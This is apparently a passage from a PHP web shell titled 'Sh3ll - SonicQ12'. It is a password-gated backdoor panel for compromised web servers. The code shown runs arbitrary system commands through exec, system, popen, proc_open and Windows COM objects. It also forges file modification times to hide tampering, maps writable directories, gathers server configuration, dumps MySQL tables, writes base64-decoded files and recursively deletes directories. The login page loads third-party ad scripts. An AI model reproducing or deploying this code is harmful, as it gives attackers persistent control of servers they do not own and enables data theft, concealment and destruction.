        makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));

        maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));

        formfooter();

    }



    elseif ($action == 'newtime') {

        $opfilemtime = @filemtime($opfile);



        $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);

        formhead(array('title'=>'Clone file was last modified time'));

        makehide('action','file');

        makehide('dir',$nowpath);

        makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));

        makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));

        formfooter();

        formhead(array('title'=>'Set last modified'));

        makehide('action','file');

        makehide('dir',$nowpath);

        makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));

        p('<p>Instead &raquo;');

        p('year:');

        makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));

        p('month:');

        makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));

        p('day:');

        makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));

        p('hour:');

        makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));

        p('minute:');

        makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));

        p('second:');

        makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));

        p('</p>');

        formfooter();

    }



    elseif ($action == 'shell') {

        if (IS_WIN && IS_COM) {

            if($program && $parameter) {

                $shell= new COM('Shell.Application');

                $a = $shell->ShellExecute($program,$parameter);

                m('Program run has '.(!$a ? 'success' : 'fail'));

            }

            !$program && $program = 'c:\windows\system32\cmd.exe';

            !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';

            formhead(array('title'=>'Execute Program'));

            makehide('action','shell');

            makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));

            p('<p>');

            makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));

            makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));

            p('</p>');

            formfoot();

        }

        formhead(array('title'=>'Execute Command'));

        makehide('action','shell');

        if (IS_WIN && IS_COM) {

            $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');

            makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));

        }

        p('<p>');

        makeinput(array('title'=>'Command','name'=>'command','value'=>$command));

        makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));

        p('</p>');

        formfoot();



        if ($command) {

            p('<hr width="100%" noshade /><pre>');

            if ($execfunc=='wscript' && IS_WIN && IS_COM) {

                $wsh = new COM('WScript.shell');

                $exec = $wsh->exec('cmd.exe /c '.$command);

                $stdout = $exec->StdOut();

                $stroutput = $stdout->ReadAll();

                echo $stroutput;

            } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {

                $descriptorspec = array(

                    0 => array('pipe', 'r'),

                    1 => array('pipe', 'w'),

                    2 => array('pipe', 'w')

                );

                $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);

                if (is_resource($process)) {

                    fwrite($pipes[0], $command."\r\n");

                    fwrite($pipes[0], "exit\r\n");

                    fclose($pipes[0]);

                    while (!feof($pipes[1])) {

                        echo fgets($pipes[1], 1024);

                    }

                    fclose($pipes[1]);

                    while (!feof($pipes[2])) {

                        echo fgets($pipes[2], 1024);

                    }

                    fclose($pipes[2]);

                    proc_close($process);

                }

            } else {

                echo(execute($command));

            }

            p('</pre>');

        }

    }



    elseif ($action == 'phpenv') {

        $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';

        $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');

        !$dis_func && $dis_func = 'No';

        $info = array(

            1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),

            2 => array('Server Domain',$_SERVER['SERVER_NAME']),

            3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),

            4 => array('Server OS',PHP_OS),

            5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),

            6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),

            7 => array('Server Web Port',$_SERVER['SERVER_PORT']),

            8 => array('PHP run mode',strtoupper(php_sapi_name())),

            9 => array('The file path',__FILE__),



            10 => array('PHP Version',PHP_VERSION),

            11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),

            12 => array('Safe Mode',getcfg('safe_mode')),

            13 => array('Administrator',$adminmail),

            14 => array('allow_url_fopen',getcfg('allow_url_fopen')),

            15 => array('enable_dl',getcfg('enable_dl')),

            16 => array('display_errors',getcfg('display_errors')),

            17 => array('register_globals',getcfg('register_globals')),

            18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),

            19 => array('memory_limit',getcfg('memory_limit')),

            20 => array('post_max_size',getcfg('post_max_size')),

            21 => array('upload_max_filesize',$upsize),

            22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),

            23 => array('disable_functions',$dis_func),

        );



        if($phpvarname) {

            m($phpvarname .' : '.getcfg($phpvarname));

        }



        formhead(array('title'=>'Server environment'));

        makehide('action','phpenv');

        makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));

        formfooter();



        $hp = array(0=> 'Server', 1=> 'PHP');

        for($a=0;$a<2;$a++) {

            p('<h2>'.$hp[$a].' &raquo;</h2>');

            p('<ul class="info">');

            if ($a==0) {

                for($i=1;$i<=9;$i++) {

                    p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');

                }

            } elseif ($a == 1) {

                for($i=10;$i<=23;$i++) {

                    p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');

                }

            }

            p('</ul>');

        }

    }



    else {

        m('Undefined Action');

    }



    ?>

    </td></tr></table>

    <div style="padding:10px;">

        <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>

        Copyright (C) 2013/2014 Developed by  <font title="SonicQ12">SonicQ12</font>

    </div>

    </body>

    </html>



<?php




function m($msg) {

    echo '<div style="background:#00b000;border:1px solid #006700;padding:15px;font:14px;color:#ffffff;text-align:center;font-weight:bold;">';

    echo $msg;

    echo '</div>';

}

function scookie($key, $value, $life = 0, $prefix = 1) {

    //global $admin, $timestamp, $_SERVER;

    //$key = ($prefix ? $admin['cookiepre'] : '').$key;

    //$life = $life ? $life : $admin['cookielife'];

    //$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
	
	$_SESSION[$key] = $value;
	
    //setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);

}

function multi($num, $perpage, $curpage, $tablename) {

    $multipage = '';

    if($num > $perpage) {

        $page = 10;

        $offset = 5;

        $pages = @ceil($num / $perpage);

        if($page > $pages) {

            $from = 1;

            $to = $pages;

        } else {

            $from = $curpage - $offset;

            $to = $curpage + $page - $offset - 1;

            if($from < 1) {

                $to = $curpage + 1 - $from;

                $from = 1;

                if(($to - $from) < $page && ($to - $from) < $pages) {

                    $to = $page;

                }

            } elseif($to > $pages) {

                $from = $curpage - $pages + $to;

                $to = $pages;

                if(($to - $from) < $page && ($to - $from) < $pages) {

                    $from = $pages - $page + 1;

                }

            }

        }

        $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');

        for($i = $from; $i <= $to; $i++) {

            $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';

        }

        $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');

        $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';

    }

    return $multipage;

}



function loginpage() {
?>
<html>
<head>
<link rel="icon" href="http://thumbs.dreamstime.com/thumb_411/12455464854iEKQ2.jpg" type="image/x-icon">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Sh3ll - SonicQ12</title>
<script type="text/javascript"> 
    var adfly_id = 6099598; 
    var adfly_advert = 'int'; 
    var frequency_cap = 5; 
    var frequency_delay = 5; 
    var init_delay = 3; 
</script> 
<script src="https://cdn.adf.ly/js/entry.js"></script> 
<style type="text/css">
body{
color: #00FF00;
}
A:link {text-decoration: none; color: green }
A:visited {text-decoration: none;color:#00FF00}
A:active {text-decoration: none}
A:hover {text-decoration: underline; color: green;}
input, textarea, button{
	font-size: 9pt;
	color: #00FF00;
	font-family: verdana, sans-serif;
	background-color: #202020;
	border-left: 1px solid #00FF00;
	border-top: 1px solid #00FF00;
	border-right: 1px solid #00FF00;
	border-bottom: 1px solid #00FF00;
}
div{
border-style: dotted solid;
box-shadow: 2px 3px green;
}
</style>
</head>
<body bgcolor=black>
<center>
<form method="POST">
	<div style="width: 350px;">
		<table>
		<tr><td align="center" colspan="2"> [ ACCESS DENIED ] </td></tr>
		<tr><td align="center">Your IP: </td><td align="center"><?=$_SERVER['REMOTE_ADDR']?></td></tr>
		<tr><td align="center">Password: </td><td align="center"><input type="password" name="password" /></td></tr>
		<tr><td colspan="2" align="right"><input type="hidden" name="login" value="login"/><input type="submit" value="Login"/></td></tr>
		</table>
	</div>
</form>
</center>
</body>
</html>
<?php
exit;
}



function execute($cfe) {

    $res = '';

    if ($cfe) {

        if(function_exists('exec')) {

            @exec($cfe,$res);

            $res = join("\n",$res);

        } elseif(function_exists('shell_exec')) {

            $res = @shell_exec($cfe);

        } elseif(function_exists('system')) {

            @ob_start();

            @system($cfe);

            $res = @ob_get_contents();

            @ob_end_clean();

        } elseif(function_exists('passthru')) {

            @ob_start();

            @passthru($cfe);

            $res = @ob_get_contents();

            @ob_end_clean();

        } elseif(@is_resource($f = @popen($cfe,"r"))) {

            $res = '';

            while(!@feof($f)) {

                $res .= @fread($f,1024);

            }

            @pclose($f);

        }

    }

    return $res;

}

function which($pr) {

    $path = execute("which $pr");

    return ($path ? $path : $pr);

}



function cf($fname,$text){

    if($fp=@fopen($fname,'w')) {

        @fputs($fp,@base64_decode($text));

        @fclose($fp);

    }

}





function debuginfo() {

    global $starttime;

    $mtime = explode(' ', microtime());

    $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);

    echo 'Processed in '.$totaltime.' second(s)';

}





function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {

    if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {

        p('<h2>Can not connect to MySQL server</h2>');

        exit;

    }

    if($link && $dbname) {

        if (!@mysql_select_db($dbname, $link)) {

            p('<h2>Database selected has error</h2>');

            exit;

        }

    }

    if($link && mysql_get_server_info() > '4.1') {

        if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {

            q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);

        }

    }

    return $link;

}





function s_array(&$array) {

    if (is_array($array)) {

        foreach ($array as $k => $v) {

            $array[$k] = s_array($v);

        }

    } else if (is_string($array)) {

        $array = stripslashes($array);

    }

    return $array;

}





function html_clean($content) {

    $content = htmlspecialchars($content);

    $content = str_replace("\n", "<br />", $content);

    $content = str_replace("  ", "&nbsp;&nbsp;", $content);

    $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);

    return $content;

}





function getChmod($filepath){

    return substr(base_convert(@fileperms($filepath),10,8),-4);

}



function getPerms($filepath) {

    $mode = @fileperms($filepath);

    if (($mode & 0xC000) === 0xC000) {$type = 's';}

    elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}

    elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}

    elseif (($mode & 0x8000) === 0x8000) {$type = '-';}

    elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}

    elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}

    elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}

    else {$type = '?';}



    $owner['read'] = ($mode & 00400) ? 'r' : '-';

    $owner['write'] = ($mode & 00200) ? 'w' : '-';

    $owner['execute'] = ($mode & 00100) ? 'x' : '-';

    $group['read'] = ($mode & 00040) ? 'r' : '-';

    $group['write'] = ($mode & 00020) ? 'w' : '-';

    $group['execute'] = ($mode & 00010) ? 'x' : '-';

    $world['read'] = ($mode & 00004) ? 'r' : '-';

    $world['write'] = ($mode & 00002) ? 'w' : '-';

    $world['execute'] = ($mode & 00001) ? 'x' : '-';



    if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}

    if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}

    if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}



    return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];

}



function getUser($filepath)	{

    if (function_exists('posix_getpwuid')) {

        $array = @posix_getpwuid(@fileowner($filepath));

        if ($array && is_array($array)) {

            return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';

        }

    }

    return '';

}





function deltree($deldir) {

    $mydir=@dir($deldir);

    while($file=$mydir->read())	{

        if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {

            @chmod($deldir.'/'.$file,0777);

            deltree($deldir.'/'.$file);

        }

        if (is_file($deldir.'/'.$file)) {

            @chmod($deldir.'/'.$file,0777);

            @unlink($deldir.'/'.$file);

        }

    }

    $mydir->close();

    @chmod($deldir,0777);

    return @rmdir($deldir) ? 1 : 0;

}





function bg() {

    global $bgc;

    return ($bgc++%2==0) ? 'alt1' : 'alt2';

}





function getPath($scriptpath, $nowpath) {

    if ($nowpath == '.') {

        $nowpath = $scriptpath;

    }

    $nowpath = str_replace('\\', '/', $nowpath);

    $nowpath = str_replace('//', '/', $nowpath);

    if (substr($nowpath, -1) != '/') {

        $nowpath = $nowpath.'/';

    }

    return $nowpath;

}





function getUpPath($nowpath) {

    $pathdb = explode('/', $nowpath);

    $num = count($pathdb);

    if ($num > 2) {

        unset($pathdb[$num-1],$pathdb[$num-2]);

    }

    $uppath = implode('/', $pathdb).'/';

    $uppath = str_replace('//', '/', $uppath);

    return $uppath;

}





function getcfg($varname) {

    $result = get_cfg_var($varname);

    if ($result == 0) {

        return 'No';

    } elseif ($result == 1) {

        return 'Yes';

    } else {

        return $result;

    }

}





function getfun($funName) {

    return (false !== function_exists($funName)) ? 'Yes' : 'No';

}



function GetList($dir){

    global $dirdata,$j,$nowpath;

    !$j && $j=1;

    if ($dh = opendir($dir)) {

        while ($file = readdir($dh)) {

            $f=str_replace('//','/',$dir.'/'.$file);

            if($file!='.' && $file!='..' && is_dir($f)){

                if (is_writable($f)) {

                    $dirdata[$j]['filename']=str_replace($nowpath,'',$f);

                    $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));

                    $dirdata[$j]['dirchmod']=getChmod($f);

                    $dirdata[$j]['dirperm']=getPerms($f);

                    $dirdata[$j]['dirlink']=ue($dir);

                    $dirdata[$j]['server_link']=$f;

                    $dirdata[$j]['client_link']=ue($f);

                    $j++;

                }

                GetList($f);

            }

        }

        closedir($dh);

        clearstatcache();

        return $dirdata;

    } else {

        return array();

    }

}



function qy($sql) {



    $res = $error = '';

    if(!$res = @mysql_query($sql)) {

        return 0;

    } else if(is_resource($res)) {

        return 1;

    } else {

        return 2;

    }

    return 0;

}



function q($sql) {

    return @mysql_query($sql);

}



function fr($qy){

    mysql_free_result($qy);

}



function sizecount($size) {

    if($size > 1073741824) {

        $size = round($size / 1073741824 * 100) / 100 . ' G';

    } elseif($size > 1048576) {

        $size = round($size / 1048576 * 100) / 100 . ' M';

    } elseif($size > 1024) {

        $size = round($size / 1024 * 100) / 100 . ' K';

    } else {

        $size = $size . ' B';

    }

    return $size;

}





class PHPZip{

    var $out='';

    function PHPZip($dir)	{

        if (@function_exists('gzcompress'))	{

            $curdir = getcwd();

            if (is_array($dir)) $filelist = $dir;

            else{

                $filelist=$this -> GetFileList($dir);

                foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);

            }

            if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);

            else chdir($curdir);

            if (count($filelist)>0){

                foreach($filelist as $filename){

                    if (is_file($filename)){

                        $fd = fopen ($filename, 'r');

                        $content = @fread ($fd, filesize($filename));

                        fclose ($fd);

                        if (is_array($dir)) $filename = basename($filename);

                        $this -> addFile($content, $filename);

                    }

                }

                $this->out = $this -> file();

                chdir($curdir);

            }

            return 1;

        }

        else return 0;

    }





    function GetFileList($dir){

        static $a;

        if (is_dir($dir)) {

            if ($dh = opendir($dir)) {

                while ($file = readdir($dh)) {

                    if($file!='.' && $file!='..'){

                        $f=$dir .'/'. $file;

                        if(is_dir($f)) $this->GetFileList($f);

                        $a[]=$f;

                    }

                }

                closedir($dh);

            }

        }

        return $a;

    }



    var $datasec      = array();

    var $ctrl_dir     = array();

    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

    var $old_offset   = 0;



    function unix2DosTime($unixtime = 0) {

        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

        if ($timearray['year'] < 1980) {

            $timearray['year']    = 1980;

            $timearray['mon']     = 1;

            $timearray['mday']    = 1;

            $timearray['hours']   = 0;

            $timearray['minutes'] = 0;

            $timearray['seconds'] = 0;

        }

        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |

            ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);

    }



    function addFile($data, $name, $time = 0) {

        $name = str_replace('\\', '/', $name);



        $dtime = dechex($this->unix2DosTime($time));

        $hexdtime	= '\x' . $dtime[6] . $dtime[7]

            . '\x' . $dtime[4] . $dtime[5]

            . '\x' . $dtime[2] . $dtime[3]

            . '\x' . $dtime[0] . $dtime[1];

        eval('$hexdtime = "' . $hexdtime . '";');

        $fr	= "\x50\x4b\x03\x04";

        $fr	.= "\x14\x00";

        $fr	.= "\x00\x00";

        $fr	.= "\x08\x00";

        $fr	.= $hexdtime;



        $unc_len = strlen($data);

        $crc = crc32($data);

        $zdata = gzcompress($data);

        $c_len = strlen($zdata);

        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

        $fr .= pack('V', $crc);

        $fr .= pack('V', $c_len);

        $fr .= pack('V', $unc_len);

        $fr .= pack('v', strlen($name));

        $fr .= pack('v', 0);

        $fr .= $name;

        $fr .= $zdata;

        $fr .= pack('V', $crc);

        $fr .= pack('V', $c_len);

        $fr .= pack('V', $unc_len);



        $this -> datasec[] = $fr;

        $new_offset = strlen(implode('', $this->datasec));



        $cdrec = "\x50\x4b\x01\x02";

        $cdrec .= "\x00\x00";

        $cdrec .= "\x14\x00";

        $cdrec .= "\x00\x00";

        $cdrec .= "\x08\x00";

        $cdrec .= $hexdtime;

        $cdrec .= pack('V', $crc);

        $cdrec .= pack('V', $c_len);

        $cdrec .= pack('V', $unc_len);

        $cdrec .= pack('v', strlen($name) );

        $cdrec .= pack('v', 0 );

        $cdrec .= pack('v', 0 );

        $cdrec .= pack('v', 0 );

        $cdrec .= pack('v', 0 );

        $cdrec .= pack('V', 32 );

        $cdrec .= pack('V', $this -> old_offset );

        $this -> old_offset = $new_offset;

        $cdrec .= $name;



        $this -> ctrl_dir[] = $cdrec;

    }



    function file() {

        $data    = implode('', $this -> datasec);

        $ctrldir = implode('', $this -> ctrl_dir);

        return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";

    }

}





function sqldumptable($table, $fp=0) {

    $tabledump = "DROP TABLE IF EXISTS $table;\n";

    $tabledump .= "CREATE TABLE $table (\n";



    $firstfield=1;



    $fields = q("SHOW FIELDS FROM $table");

    while ($field = mysql_fetch_array($fields)) {

        if (!$firstfield) {

            $tabledump .= ",\n";

        } else {

            $firstfield=0;

        }

        $tabledump .= "   $field[Field] $field[Type]";

        if (!empty($field["Default"])) {

            $tabledump .= " DEFAULT '$field[Default]'";

        }

        if ($field['Null'] != "YES") {

            $tabledump .= " NOT NULL";

        }

        if ($field['Extra'] != "") {

            $tabledump .= " $field[Extra]";

        }

    }

    fr($fields);



    $keys = q("SHOW KEYS FROM $table");

    while ($key = mysql_fetch_array($keys)) {

        $kname=$key['Key_name'];

        if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {

            $kname="UNIQUE|$kname";

        }

        if(!is_array($index[$kname])) {

            $index[$kname] = array();

        }

        $index[$kname][] = $key['Column_name'];

    }

    fr($keys);



    while(list($kname, $columns) = @each($index)) {

        $tabledump .= ",\n";

        $colnames=implode($columns,",");



        if ($kname == "PRIMARY") {

            $tabledump .= "   PRIMARY KEY ($colnames)";

        } else {

            if (substr($kname,0,6) == "UNIQUE") {

                $kname=substr($kname,7);

            }

            $tabledump .= "   KEY $kname ($colnames)";

        }

    }



    $tabledump .= "\n);\n\n";

    if ($fp) {

        fwrite($fp,$tabledump);

    } else {

        echo $tabledump;

    }



    $rows = q("SELECT * FROM $table");

    $numfields = mysql_num_fields($rows);

    while ($row = mysql_fetch_array($rows)) {

        $tabledump = "INSERT INTO $table VALUES(";



        $fieldcounter=-1;

        $firstfield=1;

        while (++$fieldcounter<$numfields) {

            if (!$firstfield) {

                $tabledump.=", ";

            } else {

                $firstfield=0;

            }



            if (!isset($row[$fieldcounter])) {

                $tabledump .= "NULL";

            } else {

                $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";

            }

        }



        $tabledump .= ");\n";



        if ($fp) {

            fwrite($fp,$tabledump);

        } else {

            echo $tabledump;

        }

    }

    fr($rows);

    if ($fp) {

        fwrite($fp,"\n");

    } else {

        echo "\n";

    }

}



function ue($str){

    return urlencode($str);

}



function p($str){

    echo $str."\n";

}



function tbhead() {

    p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');

}

function tbfoot(){

    p('</table>');

}



function makehide($name,$value=''){

    p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");

}



function makeinput($arg = array()){

    $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";

    $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';

    !$arg['type'] && $arg['type'] = 'text';

    $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';

    $arg['class'] = $arg['class'] ? $arg['class'] : 'input';

    if ($arg['newline']) {

        p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");

    } else {

        p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");

    }

}



function makeselect($arg = array()){

    if ($arg['onchange']) {

        $onchange = 'onchange="'.$arg['onchange'].'"';

    }

    $arg['title'] = $arg['title'] ? $arg['title'] : '';

    if ($arg['newline']) p('<p>');

    p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");

    if (is_array($arg['option'])) {

        foreach ($arg['option'] as $key=>$value) {

            if ($arg['selected']==$key) {

                p("<option value=\"$key\" selected>$value</option>");

            } else {

                p("<option value=\"$key\">$value</option>");

            }

        }

    }

    p("</select>");

    if ($arg['newline']) p('</p>');

}

function formhead($arg = array()) {

    !$arg['method'] && $arg['method'] = 'post';

    !$arg['action'] && $arg['action'] = $self;

    $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';

    !$arg['name'] && $arg['name'] = 'form1';

    p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");

    if ($arg['title']) {

        p('<h2>'.$arg['title'].' &raquo;</h2>');

    }

}



function maketext($arg = array()){

    !$arg['cols'] && $arg['cols'] = 100;

    !$arg['rows'] && $arg['rows'] = 25;

    $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';

    p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");

}



function formfooter($name = ''){

    !$name && $name = 'submit';

    p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');

    p('</form>');

}



function formfoot(){

    p('</form>');

}





function pr($a) {

    echo '<pre>';

    print_r($a);

    echo '</pre>';

}
?>